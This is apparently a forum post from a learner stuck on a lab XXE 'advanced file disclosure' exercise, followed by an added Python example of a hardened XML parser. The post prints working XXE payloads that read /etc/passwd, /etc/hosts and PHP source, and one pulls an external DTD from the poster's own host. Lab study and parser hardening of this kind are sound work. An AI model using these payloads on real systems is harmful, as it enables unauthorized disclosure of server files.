Hello fam,
I am now having a problem in XXE Advanced File Disclosure!
The Lab Question: Use either method from this section to read the flag at ‘/flag.php’. (You may use the CDATA method at ‘/index.php’, or the error-based method at ‘/error’).
My Approach: So I tried the CDATA method as follows:
I first made an xxe.dtd file with the contents <!ENTITY joined "%begin;%file;%end;">
on my host, and after that I started my web server!
I go to the target IP website and start intercepting with Burp. As expected, the request goes through '/submitDetails.php' with the POST method. So I tried to alter the XML data to perform an XXE attack.
Attempt 1
I include the data,
<!DOCTYPE email [
<!ENTITY % begin "<![CDATA["> <!-- prepend the beginning of the CDATA tag -->
<!ENTITY % file SYSTEM "file:///etc/hosts"> <!-- reference external file -->
<!ENTITY % end "]]>"> <!-- append the end of the CDATA tag -->
<!ENTITY % xxe SYSTEM "http://10.10.14.204:8000/xxe.dtd"> <!-- reference our external DTD -->
%xxe;
]>
.
.
.
<email>&joined;</email>
which works as expected.
Sorry, I had to delete the screenshot, as they don't permit me to post one as a new user.
Attempt 2
So I tried the core feature of the CDATA method, getting the PHP source code of submitDetails.php, with the following payload.
<!DOCTYPE email [
<!ENTITY % begin "<![CDATA["> <!-- prepend the beginning of the CDATA tag -->
<!ENTITY % file SYSTEM "file:////var/www/html/submitDetails.php"> <!-- reference external file -->
<!ENTITY % end "]]>"> <!-- append the end of the CDATA tag -->
<!ENTITY % xxe SYSTEM "http://10.10.14.204:8000/xxe.dtd"> <!-- reference our external DTD -->
%xxe;
]>
.
.
.
<email>&joined;</email>
But this doesn't output anything, as we expected it to.
Sorry, I had to delete the screenshot, as they don't permit me to post one as a new user.
Attempt 3
So I tried to check another one, this time another system file, /etc/passwd. Surprisingly, this doesn't work either (unlike /etc/hosts, which worked).
Attempt 4
OK, I thought maybe they limit the file permissions or the output size, so I tried a basic XXE like the following.
<!DOCTYPE foo [<!ENTITY example SYSTEM "/etc/passwd"> ]>
.
.
.
<email>&example;</email>
But guess what, this works.
Sorry, I had to delete the screenshot, as they don't permit me to post one as a new user.
Attempt 5
I have tried the things that I know, but none of them worked.
Bonus: So I tried to see what the /flag.php from the question looks like, but it returns a 404 error, not a 302 or 500.
So I came here to ask for help. Maybe there is some glitch in the lab setup? Or am I missing something important?
Thanks a lot. Please help me solve this puzzle.
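For anyone reading this thread from the other side of the request, here is an added example (not code from the original post or from the lab) of what a hardened intake for a client-supplied XML body like the one sent to /submitDetails.php looks like. It uses only the Python standard library (pyexpat); the element names, the sample bodies and the endpoint behaviour are constructed for the example. Two independent layers stop the payload shapes quoted in the post: the DOCTYPE, which is where the entities get declared, is refused outright, and even where a DOCTYPE is deliberately allowed, external (SYSTEM/PUBLIC) entities are never resolved and external parameter entities such as a remote .dtd are never loaded.

```python
"""Hardened XML intake (added example, not from the original post or lab)."""
import xml.parsers.expat as expat


class UnsafeXML(ValueError):
    """Raised when untrusted XML tries to use a DTD or an external entity."""


def parse_untrusted_xml(data: bytes, allow_doctype: bool = False) -> dict:
    """Parse client XML and return {element_name: text} for text-bearing elements.

    Layer 1: reject any DOCTYPE unless the caller explicitly opts in.
    Layer 2: never resolve external entities, never load external parameter
             entities (e.g. a %xxe; reference to an attacker-hosted .dtd).
    """
    parser = expat.ParserCreate()
    # External parameter entities are never fetched, whatever the DTD says.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    fields = {}
    buf = []

    def on_doctype(name, system_id, public_id, has_internal_subset):
        if not allow_doctype:
            raise UnsafeXML(f"DOCTYPE {name!r} is not allowed in client XML")

    def on_external_entity(context, base, system_id, public_id):
        # Invoked when content references an entity declared SYSTEM "...".
        # Raising here aborts the parse before anything is read from disk or
        # fetched over the network (expat never dereferences it itself).
        raise UnsafeXML(f"refusing to resolve external entity {system_id!r}")

    def on_start(name, attrs):
        buf.clear()

    def on_chars(text):
        buf.append(text)

    def on_end(name):
        text = "".join(buf).strip()
        if text:
            fields[name] = text
        buf.clear()

    parser.StartDoctypeDeclHandler = on_doctype
    parser.ExternalEntityRefHandler = on_external_entity
    parser.StartElementHandler = on_start
    parser.CharacterDataHandler = on_chars
    parser.EndElementHandler = on_end
    parser.Parse(data, True)
    return fields


def classify(data: bytes, allow_doctype: bool = False) -> str:
    """Outcome label for logging/alerting: 'ok', 'blocked' or 'malformed'."""
    try:
        parse_untrusted_xml(data, allow_doctype)
        return "ok"
    except UnsafeXML:
        return "blocked"        # worth an alert: someone sent a DTD/external entity
    except expat.ExpatError:
        return "malformed"      # plain bad XML, not necessarily hostile


# Constructed sample bodies; shapes follow the post, values are made up.
BENIGN = b"<root><name>Ann</name><email>ann@example.com</email></root>"
BASIC_XXE = (b'<!DOCTYPE foo [<!ENTITY example SYSTEM "/etc/passwd"> ]>'
             b"<root><email>&example;</email></root>")

if __name__ == "__main__":
    print(parse_untrusted_xml(BENIGN))
    print(classify(BASIC_XXE))                      # blocked at the DOCTYPE
    print(classify(BASIC_XXE, allow_doctype=True))  # blocked at entity resolution
```

The 'blocked' outcome is the one to wire into logging: a legitimate client has no reason to send a DOCTYPE to this kind of endpoint, so each such request is a clean detection signal, while 'malformed' is ordinary input validation noise.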